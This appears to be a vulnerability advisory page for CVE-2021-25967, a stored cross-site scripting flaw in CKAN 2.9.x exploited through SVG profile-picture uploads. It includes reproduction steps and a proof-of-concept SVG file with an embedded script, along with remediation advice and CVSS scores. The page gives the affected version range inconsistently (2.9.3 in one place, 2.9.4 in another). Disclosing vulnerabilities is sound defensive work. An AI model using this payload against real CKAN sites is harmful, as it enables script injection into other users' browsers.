icon

We found results for “

CVE-2021-25967

Date: December 1, 2021

Overview

In CKAN, versions 2.9.0 to 2.9.3 are affected by a stored XSS vulnerability via SVG file upload of users’ profile picture. This allows low privileged application users to store malicious scripts in their profile picture. These scripts are executed in a victim’s browser when they open the malicious profile picture

Details

The “CKAN” application is affected by a stored XSS vulnerability via SVG file upload of users’ profile picture that allows low privileged application users to store malicious scripts in their profile picture. These scripts are executed in a victim’s browser when they open the malicious profile picture.

PoC Details

Register as a new user in the application (For demonstration purposes, we will call him “Bob”). Fill in all the required fields and upload a malicious svg file, such as given below.
Now open the application in a private window and login to the application as an administrator user.
Go to Users, “Bob”, and right click the profile picture. Click on “Open Image in New Tab” and see the malicious payload being triggered.

PoC Code

// Malicious SVG file contents:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.domain);
  </script>
</svg>

Affected Environments

PyPI: 2.9.0 through 2.9.4; Github: ckan-2.9.0 through ckan-2.9.4

Remediation

Our suggestion here is to implement CSP to disallow inline Javascript, or use the “content-disposition: attachment” header which forces the file to get downloaded.

Prevention

No fix was provided by the maintainer.

Language: Python

Good to know:

icon
icon

Cross-Site Scripting (XSS)

CWE-79
icon

Upgrade Version

No fix version available

Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High
Base Score:
Access Vector (AV): Network
Access Complexity (AC): Low
Authentication (AU): Single
Confidentiality (C): Partial
Integrity (I): Partial
Availability (A): Partial
Additional information: